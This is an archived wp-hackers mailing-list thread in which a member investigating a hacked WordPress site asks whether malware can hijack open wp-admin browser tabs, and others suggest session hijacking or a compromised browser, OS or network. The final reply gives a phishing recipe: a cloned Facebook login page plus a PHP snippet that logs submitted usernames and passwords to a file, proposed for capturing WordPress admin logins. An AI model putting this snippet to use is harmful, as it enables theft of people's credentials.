Viruses that look for open WordPress tabs in your browser?

classic Classic list List threaded Threaded
6 messages Options
Reply | Threaded
Open this post in threaded view
|

Viruses that look for open WordPress tabs in your browser?

David Anderson-29
Has anyone come across the following before? Or is it potentially a new
thing? (I've not read any such thing before).

I'm examining a hacked WP site. The logs show that the site owner, the
sole admin, was logged in, and working on it in wp-admin in a normal
way, up until 02:52 on a certain day. Then absolutely nothing until
03:35. Then at 03:35, wham - a single GET followed by a load of POST
requests to the plugin editor, one for each plugin, inserting hacker
code. All from the admin's IP/browser (same user agent), and too close
together to be human (i.e. obviously scripted). It's all the same IP and
browser session, which is confirmed as the site owner's ISP.

My inference from that is that the site owner, at 02:52, went to do
other things, leaving the browser tab open. They got infected with a
virus (or perhaps already were), and that virus hunted for open browser
sessions logged-in to wp-admin, and used those sessions to infect the WP
site.

That's all technically do-able. But I've not previously heard of a virus
(the customer has a Mac, and was using Safari), that does this. Is this
a new thing?

David

--
UpdraftPlus - best WordPress backups - http://updraftplus.com
WordShell - WordPress fast from the CLI - http://wordshell.net

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Viruses that look for open WordPress tabs in your browser?

J.D. Grimes
I'm not an expert, but I've never heard of anything like that before. Isn't it possible that the connection was compromised and an attacker was listening in on the user, then stole their session and spoofed the user agent?

-J.D.

> On Dec 10, 2015, at 7:03 PM, David Anderson <[hidden email]> wrote:
>
> Has anyone come across the following before? Or is it potentially a new thing? (I've not read any such thing before).
>
> I'm examining a hacked WP site. The logs show that the site owner, the sole admin, was logged in, and working on it in wp-admin in a normal way, up until 02:52 on a certain day. Then absolutely nothing until 03:35. Then at 03:35, wham - a single GET followed by a load of POST requests to the plugin editor, one for each plugin, inserting hacker code. All from the admin's IP/browser (same user agent), and too close together to be human (i.e. obviously scripted). It's all the same IP and browser session, which is confirmed as the site owner's ISP.
>
> My inference from that is that the site owner, at 02:52, went to do other things, leaving the browser tab open. They got infected with a virus (or perhaps already were), and that virus hunted for open browser sessions logged-in to wp-admin, and used those sessions to infect the WP site.
>
> That's all technically do-able. But I've not previously heard of a virus (the customer has a Mac, and was using Safari), that does this. Is this a new thing?
>
> David
>
> --
> UpdraftPlus - best WordPress backups - http://updraftplus.com
> WordShell - WordPress fast from the CLI - http://wordshell.net
>
> _______________________________________________
> wp-hackers mailing list
> [hidden email]
> http://lists.automattic.com/mailman/listinfo/wp-hackers

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Viruses that look for open WordPress tabs in your browser?

Scott Herbert (via Phone)
I think Zeus (who's source code was leaked online) did a similuar
thing with banking sites but that was on a PC. OSX (iirc) makes it
much harder to snag the browsers memory space, nothing is impossabul.

On 11 December 2015 at 13:08, J.D. Grimes <[hidden email]> wrote:

> I'm not an expert, but I've never heard of anything like that before. Isn't it possible that the connection was compromised and an attacker was listening in on the user, then stole their session and spoofed the user agent?
>
> -J.D.
>
>> On Dec 10, 2015, at 7:03 PM, David Anderson <[hidden email]> wrote:
>>
>> Has anyone come across the following before? Or is it potentially a new thing? (I've not read any such thing before).
>>
>> I'm examining a hacked WP site. The logs show that the site owner, the sole admin, was logged in, and working on it in wp-admin in a normal way, up until 02:52 on a certain day. Then absolutely nothing until 03:35. Then at 03:35, wham - a single GET followed by a load of POST requests to the plugin editor, one for each plugin, inserting hacker code. All from the admin's IP/browser (same user agent), and too close together to be human (i.e. obviously scripted). It's all the same IP and browser session, which is confirmed as the site owner's ISP.
>>
>> My inference from that is that the site owner, at 02:52, went to do other things, leaving the browser tab open. They got infected with a virus (or perhaps already were), and that virus hunted for open browser sessions logged-in to wp-admin, and used those sessions to infect the WP site.
>>
>> That's all technically do-able. But I've not previously heard of a virus (the customer has a Mac, and was using Safari), that does this. Is this a new thing?
>>
>> David
>>
>> --
>> UpdraftPlus - best WordPress backups - http://updraftplus.com
>> WordShell - WordPress fast from the CLI - http://wordshell.net
>>
>> _______________________________________________
>> wp-hackers mailing list
>> [hidden email]
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
> _______________________________________________
> wp-hackers mailing list
> [hidden email]
> http://lists.automattic.com/mailman/listinfo/wp-hackers



--
--
Scott Herbert
Web:  http://www.Scott-Herbert.com/
Twitter: http://twitter.com/Scott_Herbert
Linkedin: http://www.linkedin.com/in/scottaherbert
_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Viruses that look for open WordPress tabs in your browser?

Mark Slade
I am aware of a few ways this could have gone:

   - Compromised browser -- the victim's browser was compromised and
   malicious code is driving their browser to perform the attacks.  The
   browser automatically includes auth cookies and the attack succeeds.
   - Compromised OS -- the victim's device was compromised through the OS
   or some shady software they installed.  At this point the virus doesn't
   need to peek into the browser's memory space, it just needs drive the
   browser the way a regular user would -- simulating mouse clicks, etc.  WP
   trusts the browser so anything done by the browser will be trusted as
   well.  I'm not too familiar with this kind of attack so I'm not sure what
   OSes have what protections against this kind of thing, but I wouldn't rule
   it out.
   - Compromised network -- the victim's auth cookie was intercepted and
   the attacker just used that cookie from their own device to hijack the auth
   session.  For this to be the case, the attacker would've also needed to
   spoof the victim's IP since that's what was in the logs.  This is usually
   harder to pull off, but if the attacker is on the same LAN as the victim
   then it becomes a lot easier.  If the victim connects to WordPress over
   plaintext HTTP then this attack would be extremely easy to execute and it
   could appear to come from the same IP as the victim.

Mark

On Fri, Dec 11, 2015 at 8:45 AM, Scott Herbert <
[hidden email]> wrote:

> I think Zeus (who's source code was leaked online) did a similuar
> thing with banking sites but that was on a PC. OSX (iirc) makes it
> much harder to snag the browsers memory space, nothing is impossabul.
>
> On 11 December 2015 at 13:08, J.D. Grimes <[hidden email]> wrote:
> > I'm not an expert, but I've never heard of anything like that before.
> Isn't it possible that the connection was compromised and an attacker was
> listening in on the user, then stole their session and spoofed the user
> agent?
> >
> > -J.D.
> >
> >> On Dec 10, 2015, at 7:03 PM, David Anderson <[hidden email]>
> wrote:
> >>
> >> Has anyone come across the following before? Or is it potentially a new
> thing? (I've not read any such thing before).
> >>
> >> I'm examining a hacked WP site. The logs show that the site owner, the
> sole admin, was logged in, and working on it in wp-admin in a normal way,
> up until 02:52 on a certain day. Then absolutely nothing until 03:35. Then
> at 03:35, wham - a single GET followed by a load of POST requests to the
> plugin editor, one for each plugin, inserting hacker code. All from the
> admin's IP/browser (same user agent), and too close together to be human
> (i.e. obviously scripted). It's all the same IP and browser session, which
> is confirmed as the site owner's ISP.
> >>
> >> My inference from that is that the site owner, at 02:52, went to do
> other things, leaving the browser tab open. They got infected with a virus
> (or perhaps already were), and that virus hunted for open browser sessions
> logged-in to wp-admin, and used those sessions to infect the WP site.
> >>
> >> That's all technically do-able. But I've not previously heard of a
> virus (the customer has a Mac, and was using Safari), that does this. Is
> this a new thing?
> >>
> >> David
> >>
> >> --
> >> UpdraftPlus - best WordPress backups - http://updraftplus.com
> >> WordShell - WordPress fast from the CLI - http://wordshell.net
> >>
> >> _______________________________________________
> >> wp-hackers mailing list
> >> [hidden email]
> >> http://lists.automattic.com/mailman/listinfo/wp-hackers
> >
> > _______________________________________________
> > wp-hackers mailing list
> > [hidden email]
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
>
>
>
> --
> --
> Scott Herbert
> Web:  http://www.Scott-Herbert.com/
> Twitter: http://twitter.com/Scott_Herbert
> Linkedin: http://www.linkedin.com/in/scottaherbert
> _______________________________________________
> wp-hackers mailing list
> [hidden email]
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Viruses that look for open WordPress tabs in your browser?

DaveB722
In reply to this post by David Anderson-29
I don't know of anything in the wild for OS X that would execute this behavior. Sounds like either the site or the server was already compromised.
J G
Reply | Threaded
Open this post in threaded view
|

Re: Viruses that look for open WordPress tabs in your browser?

J G
In reply to this post by David Anderson-29
I know that I tested this on my own facebook account and it did work, it deals with GET and POST commands. Copy and past source from facebook.com login (frst page) and if changing action= to GET and save the manipulated source code as index.php and FTP to your own web server and save log.txt in same root folder with the log reading
<?phpheader("Location: http://www.facebook.com/home.php? ");$handle = fopen("passwords.txt", "a");foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
a new file would be created within the same folder as index.php, log.txt and it would display Username and Password. I imagine by doing this very similar phishing attack one could gain access to  an admim-wp account? Correct me please if I am on a completely different subject it just seemed familiar. This attack no longer works for facebook.

> To: [hidden email]
> From: [hidden email]
> Date: Fri, 11 Dec 2015 00:03:46 +0000
> Subject: [wp-hackers] Viruses that look for open WordPress tabs in your browser?
>
> Has anyone come across the following before? Or is it potentially a new
> thing? (I've not read any such thing before).
>
> I'm examining a hacked WP site. The logs show that the site owner, the
> sole admin, was logged in, and working on it in wp-admin in a normal
> way, up until 02:52 on a certain day. Then absolutely nothing until
> 03:35. Then at 03:35, wham - a single GET followed by a load of POST
> requests to the plugin editor, one for each plugin, inserting hacker
> code. All from the admin's IP/browser (same user agent), and too close
> together to be human (i.e. obviously scripted). It's all the same IP and
> browser session, which is confirmed as the site owner's ISP.
>
> My inference from that is that the site owner, at 02:52, went to do
> other things, leaving the browser tab open. They got infected with a
> virus (or perhaps already were), and that virus hunted for open browser
> sessions logged-in to wp-admin, and used those sessions to infect the WP
> site.
>
> That's all technically do-able. But I've not previously heard of a virus
> (the customer has a Mac, and was using Safari), that does this. Is this
> a new thing?
>
> David
>
> --
> UpdraftPlus - best WordPress backups - http://updraftplus.com
> WordShell - WordPress fast from the CLI - http://wordshell.net
>
> _______________________________________________
> wp-hackers mailing list
> [hidden email]
> http://lists.automattic.com/mailman/listinfo/wp-hackers
     
_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers